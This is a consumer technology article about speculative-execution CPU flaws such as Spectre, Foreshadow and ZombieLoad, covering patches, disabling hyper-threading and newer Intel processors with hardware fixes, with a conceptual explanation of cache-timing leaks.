Current CPUs have design flaws. Spectre exposed them, but attacks like Foreshadow and now ZombieLoad exploit similar weaknesses. These “speculative execution” flaws can only truly be fixed by buying a new CPU with built-in protection.
Patches Often Slow Down Existing CPUs
The industry has been frantically scrambling to patch “side-channel attacks” like Spectre and Foreshadow, which trick the CPU into revealing information it shouldn’t. Protection for current CPUs has been made available through microcode updates, operating system-level fixes, and patches to applications like web browsers.
Now, ZombieLoad raises a new threat: To lock down and secure a system from this attack fully, you have to disable Intel’s hyper-threading. That’s why Google just disabled hyperthreading on Intel Chromebooks. As usual, CPU microcode updates, browser updates, and operating system patches are on their way to try to plug the hole. Most people shouldn’t need to disable hyper-threading once these patches are in place.
New Intel CPUs Aren’t Vulnerable to ZombieLoad
But ZombieLoad isn’t a danger on systems with new Intel CPUs. As Intel puts it, ZombieLoad “is addressed in hardware starting with select 8th and 9th Generation Intel® Core™ processors, as well as the 2nd Generation Intel® Xeon® Scalable processor family.” Systems with these modern CPUs aren’t vulnerable to this new attack.
ZombieLoad just affects Intel systems, but Spectre also affected AMD and some ARM CPUs. It’s an industry-wide problem.
The problem here is with “speculative execution”. For performance reasons, modern CPUs automatically run instructions they think they might need to run and, if they don’t, they can simply rewind and return the system to its previous state…
The core problem with both Meltdown and Spectre lies within the CPU’s cache. An application can attempt to read memory and, if it reads something in the cache, the operation will complete faster. If it tries to read something not in the cache, it will complete slower. The application can see whether or not something completes fast or slow and, while everything else during speculative execution is cleaned up and erased, the time it took to perform the operation can’t be hidden. It can then use this information to build a map of anything in the computer’s memory, one bit at a time. The caching speeds things up, but these attacks take advantage of that optimization and turns it into a security flaw.